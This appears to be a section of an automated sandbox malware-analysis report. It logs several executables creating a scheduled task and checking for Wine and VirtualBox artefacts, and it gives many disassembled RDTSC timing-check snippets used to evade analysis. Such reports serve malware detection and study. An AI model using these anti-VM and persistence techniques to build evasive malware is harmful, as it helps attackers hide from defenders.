Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\BFCGDAAKFH.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Documents\BFCGDAAKFH.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Documents\BFCGDAAKFH.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 3F9279 second address: 3F9282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 3F9282 second address: 3F8B68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b jnp 00007F79C0513875h 0x00000011 push dword ptr [ebp+122D165Dh] 0x00000017 jnp 00007F79C051386Eh 0x0000001d call dword ptr [ebp+122D2922h] 0x00000023 pushad 0x00000024 jmp 00007F79C051386Eh 0x00000029 xor eax, eax 0x0000002b sub dword ptr [ebp+122D1AC0h], eax 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 jmp 00007F79C051386Dh 0x0000003a mov dword ptr [ebp+122D3A46h], eax 0x00000040 pushad 0x00000041 call 00007F79C0513872h 0x00000046 add bx, 2532h 0x0000004b pop edx 0x0000004c mov ecx, dword ptr [ebp+122D391Eh] 0x00000052 popad 0x00000053 mov esi, 0000003Ch 0x00000058 pushad 0x00000059 mov si, bx 0x0000005c sub dword ptr [ebp+122D2676h], esi 0x00000062 popad 0x00000063 jmp 00007F79C0513879h 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c cld 0x0000006d lodsw 0x0000006f cmc 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 pushad 0x00000075 jmp 00007F79C0513871h 0x0000007a adc edx, 26296D7Ch 0x00000080 popad 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 jmp 00007F79C0513878h 0x0000008a nop 0x0000008b jmp 00007F79C051386Ch 0x00000090 push eax 0x00000091 push eax 0x00000092 push edx 0x00000093 jne 00007F79C051386Ch 0x00000099 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 3F8B68 second address: 3F8B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79C0CFE29Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 56A678 second address: 56A682 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F79C0513866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 55E634 second address: 55E638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 569A93 second address: 569AA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F79C051386Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 569AA3 second address: 569AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 56C6CC second address: 56C6D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 56C769 second address: 56C7B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F79C0CFE2A9h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007F79C0CFE298h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 56C7B0 second address: 56C7C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79C051386Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 56C8A1 second address: 56C8A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 56C8A5 second address: 56C8AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 56C8AB second address: 56C8C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jno 00007F79C0CFE296h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F79C0CFE296h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 56C9AF second address: 56C9B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F79C0513866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 56C9B9 second address: 56C9D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE29Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ebx 0x0000000e ja 00007F79C0CFE29Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 56C9D8 second address: 56CAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jng 00007F79C051388Ah 0x0000000f pop eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F79C0513868h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a add si, 8042h 0x0000002f push 00000003h 0x00000031 mov di, dx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007F79C0513868h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 mov edx, 2BB37068h 0x00000055 mov ecx, dword ptr [ebp+122D1853h] 0x0000005b push 00000003h 0x0000005d call 00007F79C0513869h 0x00000062 jbe 00007F79C051387Fh 0x00000068 jmp 00007F79C0513879h 0x0000006d push eax 0x0000006e jmp 00007F79C0513875h 0x00000073 mov eax, dword ptr [esp+04h] 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a jmp 00007F79C051386Eh 0x0000007f jmp 00007F79C051386Dh 0x00000084 popad 0x00000085 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 56CAC8 second address: 56CAD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F79C0CFE296h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 58D58C second address: 58D592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 58D592 second address: 58D59C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 58B8F4 second address: 58B8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 58B8F8 second address: 58B8FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 58B8FE second address: 58B928 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F79C051386Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F79C051386Ah 0x0000000f jmp 00007F79C0513870h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 58BEC7 second address: 58BECB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 584613 second address: 58462C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79C051386Ah 0x00000009 jmp 00007F79C051386Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 58CC8D second address: 58CC93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 58CC93 second address: 58CCD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79C0513875h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F79C0513871h 0x00000010 jnc 00007F79C0513866h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jp 00007F79C051386Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 58CCD1 second address: 58CCDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 58CCDB second address: 58CCED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F79C051386Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 58D0E6 second address: 58D103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 58D103 second address: 58D117 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F79C051386Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 58D117 second address: 58D11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 58D11B second address: 58D138 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F79C0513877h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 58D138 second address: 58D142 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F79C0CFE29Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 590956 second address: 590973 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F79C0513866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F79C0513873h 0x00000010 jmp 00007F79C051386Bh 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 590973 second address: 590979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 590979 second address: 59097D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 597C55 second address: 597C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 597C59 second address: 597C64 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007F79C0513866h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 597EBA second address: 597EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 597EC7 second address: 597EE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513875h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 597EE4 second address: 597EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 597EE8 second address: 597EEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59AA29 second address: 59AA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F79C0CFE298h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59AA3D second address: 59AA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 557930 second address: 557963 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jbe 00007F79C0CFE2C6h 0x0000000f jbe 00007F79C0CFE2ACh 0x00000015 jmp 00007F79C0CFE2A6h 0x0000001a push eax 0x0000001b push edx 0x0000001c jg 00007F79C0CFE296h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 557963 second address: 557967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59DFFB second address: 59DFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59DFFF second address: 59E022 instructions: 0x00000000 rdtsc 0x00000002 js 00007F79C0513866h 0x00000008 jmp 00007F79C0513879h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59E9B6 second address: 59E9BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59EF7B second address: 59EF80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59F69F second address: 59F6A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59F6A3 second address: 59F6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59F6A9 second address: 59F6AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59F6AF second address: 59F6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59F7A4 second address: 59F7AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59FA21 second address: 59FA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59FA25 second address: 59FA59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b and edi, dword ptr [ebp+122D39F2h] 0x00000011 jmp 00007F79C0CFE29Bh 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a jg 00007F79C0CFE296h 0x00000020 pop edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A19E5 second address: 5A19E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A19E9 second address: 5A1A8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F79C0CFE298h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 push edx 0x00000023 jmp 00007F79C0CFE2A4h 0x00000028 pop edi 0x00000029 pushad 0x0000002a mov cx, dx 0x0000002d mov dword ptr [ebp+12445B1Dh], ebx 0x00000033 popad 0x00000034 push 00000000h 0x00000036 add edi, 628E26E2h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebp 0x00000041 call 00007F79C0CFE298h 0x00000046 pop ebp 0x00000047 mov dword ptr [esp+04h], ebp 0x0000004b add dword ptr [esp+04h], 00000019h 0x00000053 inc ebp 0x00000054 push ebp 0x00000055 ret 0x00000056 pop ebp 0x00000057 ret 0x00000058 jmp 00007F79C0CFE2A5h 0x0000005d xchg eax, ebx 0x0000005e push edi 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F79C0CFE2A7h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A1A8E second address: 5A1AA2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F79C0513866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A259C second address: 5A25A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A225C second address: 5A2260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A3037 second address: 5A3048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE29Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
